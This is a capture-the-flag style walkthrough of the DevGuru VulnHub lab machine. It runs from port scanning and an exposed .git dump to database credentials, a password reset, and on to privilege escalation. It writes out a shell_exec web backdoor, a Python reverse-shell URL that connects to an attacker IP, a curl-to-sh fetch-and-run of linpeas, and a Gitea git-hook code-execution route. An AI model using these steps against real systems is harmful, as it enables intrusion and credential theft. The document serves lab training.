DevGuru

You’ll find this vm here : https://www.vulnhub.com/entry/devguru-1,620/

Port Scan

┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -sS -sV 10.0.2.254 -p-

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
8585/tcp open  unknown

Information Gathering

URL : http://10.0.2.254/

Manual Information Gathering

domain : devguru.local
email  : support@devguru.local

Wappalyzer result

October CMS
Lavarel

Directory Scan

┌──(kali㉿Zeus)-[~]
└─$ gobuster dir -u http://10.0.2.254/ -w directory-list-lowercase-2.3-medium.txt -x .php,.txt,.bak,.php.bak

/index.php            (Status: 200) [Size: 12704]
/about                (Status: 200) [Size: 18646]
/services             (Status: 200) [Size: 10014]
/themes               (Status: 301) [Size: 309] [--> http://10.0.2.254/themes/]
/0                    (Status: 200) [Size: 12654]                              
/modules              (Status: 301) [Size: 310] [--> http://10.0.2.254/modules/]
/storage              (Status: 301) [Size: 310] [--> http://10.0.2.254/storage/]
/plugins              (Status: 301) [Size: 310] [--> http://10.0.2.254/plugins/]
/server.php           (Status: 200) [Size: 0]                                   
/backend              (Status: 302) [Size: 398] [--> http://10.0.2.254/backend/backend/auth]
/vendor               (Status: 301) [Size: 309] [--> http://10.0.2.254/vendor/]             
/config               (Status: 301) [Size: 309] [--> http://10.0.2.254/config/]

Directory Scan using Dirb

┌──(kali㉿Zeus)-[~]
└─$ dirb http://devguru.local  
                                                   
+ http://devguru.local/.git/HEAD (CODE:200|SIZE:23)                                                                          
+ http://devguru.local/.htaccess (CODE:200|SIZE:1678)                                                
+ http://devguru.local/backend (CODE:302|SIZE:410)

GitTools - Git Dumper

Resource : https://github.com/internetwache/GitTools.git

┌──(kali㉿Zeus)-[~/GitTools/Dumper]
└─$ mkdir /home/kali/Desktop/devguru

┌──(kali㉿Zeus)-[~/GitTools/Dumper]
└─$ ./gitdumper.sh http://10.0.2.254/.git/ /home/kali/Desktop/devguru/

<snip>
[+] Downloaded: objects/2f/6dd1147b2ed0fe586c5599339bd56fd7ba4471
[+] Downloaded: objects/f5/fa6054214b659ab72cc4331d45a3469744895b
[+] Downloaded: objects/b5/54feea7390da59f66c32a27b3a24f69c576936

GitTools - Git Extractor

┌──(kali㉿Zeus)-[~/GitTools/Extractor]
└─$ ./extractor.sh /home/kali/Desktop/devguru /home/kali/Desktop/devguru-extracted

[*] Creating...
[+] Found commit: 7de9115700c5656c670b34987c6fbffd39d90cf2
[+] Found file: /home/kali/Desktop/devguru-extracted/0-7de9115700c5656c670b34987c6fbffd39d90cf2/.gitignore
[+] Found file: /home/kali/Desktop/devguru-extracted/0-7de9115700c5656c670b34987c6fbffd39d90cf2/.htaccess
[+] Found file: /home/kali/Desktop/devguru-extracted/0-7de9115700c5656c670b34987c6fbffd39d90cf2/README.md
[+] Found file: /home/kali/Desktop/devguru-extracted/0-7de9115700c5656c670b34987c6fbffd39d90cf2/adminer.php
<snip>

Found Database Credentials

┌──(kali㉿Zeus)-[~/Desktop/devguru-extracted/0-7de9115700c5656c670b34987c6fbffd39d90cf2/config]
└─$ cat database.php

<snip>
'mysql' => [
            'driver'     => 'mysql',
            'engine'     => 'InnoDB',
            'host'       => 'localhost',
            'port'       => 3306,
            'database'   => 'octoberdb',
            'username'   => 'october',
            'password'   => 'SQ66EBYx4GT3byXH',
            'charset'    => 'utf8mb4',
            'collation'  => 'utf8mb4_unicode_ci',
            'prefix'     => '',
            'varcharmax' => 191,
        ]
<snip>

URL : http://devguru.local/adminer.php

New Password for frank user

BCrypt Password hash : $2a$10$9Jp/609z7cFQSVL5Rv1wfOjzCo5E.lDqLsYZ/7PyJEZrsjDAful7. Plaintext Password : alienumattack

Credentials => frank:alienumattack

Modify the Code and the Markup of the homepage

Resource : https://docs.octobercms.com/2.x/services/response-view.html#returning-strings-from-a-cms-method

function onStart()
{
    $this->page["evilVar"] = shell_exec($_GET['cmd']);
}

PoC

┌──(kali㉿Zeus)-[~/Desktop]
└─$ curl http://devguru.local/?cmd=id  2>&1 | grep uid 

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse Shell

Resource : https://www.revshells.com/

Browser

http://devguru.local/?cmd=python3%20-c%20%27import%20os,pty,socket;s=socket.socket();s.connect((%2210.0.2.252%22,4444));[os.dup2(s.fileno(),f)for%20f%20in(0,1,2)];pty.spawn(%22sh%22)%27

Privileges Escalation - Frank

www-data@devguru:/$ ps aux | grep frank

<snip> /usr/local/bin/gitea web --config /etc/gitea/app.ini

linpeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Found the backup of the app.ini here : /var/backups/app.ini.bak

www-data@devguru:/$ cat /var/backups/app.ini.bak

<snipt>
[database]
DB_TYPE             = mysql
HOST                = 127.0.0.1:3306
NAME                = gitea
USER                = gitea
PASSWD              = UfFPTF8C8jjxVF2m
<snipt>

www-data@devguru:/$ mysql -ugitea -pUfFPTF8C8jjxVF2m


MariaDB [(none)]> show schemas;

+--------------------+
| Database           |
+--------------------+
| gitea              |
| information_schema |
+--------------------+



MariaDB [(none)]> use gitea


MariaDB [gitea]> show tables;

+---------------------------+
| Tables_in_gitea           |
+---------------------------+
<snip>
| user                      |
<snip>
+---------------------------+


MariaDB [gitea]> select name,salt,passwd,passwd_hash_algo as algo from user;


+-------+------------+--------------------------------------------------------------------------------
| name  | salt       | passwd                                                               | algo   |
+-------+------------+----------------------------------------------------------------------+--------+
| frank | Bop8nwtUiM | c200e0d03d1604cee72c484f154dd82d<snip>3397e26a18fb806c7a20f0b564c900 | pbkdf2 |
+-------+------------+----------------------------------------------------------------------+--------+

Change Gitea password

Resource : https://github.com/go-gitea/gitea/blob/main/models/user/user.go

Generate new hash

Run the program online : https://go.dev/play/

package main

import (
	"crypto/sha256"
	"fmt"
	"golang.org/x/crypto/pbkdf2"
)

func main() {

	var salt = "Bop8nwtUiM"
	var passwd = "alienumattack2"
	var tempPasswd []byte
	var saltBytes []byte

	saltBytes = []byte(salt)

	tempPasswd = pbkdf2.Key([]byte(passwd), saltBytes, 10000, 50, sha256.New)
	fmt.Println(fmt.Sprintf("%x", tempPasswd))
}

Result : 399f18fb256de6ea2f4f61ec77ae3d3ded89d442e7372739c4eb6e8264091a00054a3ed4e0f95f257b91814cd603802bfd93

Update the gitea password hash

MariaDB [gitea]> UPDATE user SET passwd="399f18fb256de6ea2f4f61ec77ae3d3ded89d442e7372739c4eb6e8264091a00054a3ed4e0f95f257b91814cd603802bfd93" where passwd like "c200e%";  

Rows matched: 1  Changed: 1  Warnings: 0

GiTea Authenticated Remote Code Execution using git hooks

Resource : https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/

URL => http://devguru.local:8585/ Credentials => frank:alienumattack2

The Process

create the repository and we go into

Settings -> Git Hooks -> Post Receive

User Owned

touch README.md                                                        
git config --global user.email "frank@devguru.local"                   
git init                                                               
git add README.md                                                      
git commit -m "Initial commit"                                         
git remote add origin http://devguru.local:8585/frank/alienumAttack.git
git push -u origin master                                              
Username for 'http://devguru.local:8585': frank
Password for 'http://frank@devguru.local:8585': alienumattack2

Vertical Privileges Escalation

Resource : https://gtfobins.github.io/gtfobins/sqlite3/ Resource : https://www.exploit-db.com/exploits/47502 Info : Sudo version 1.8.21p2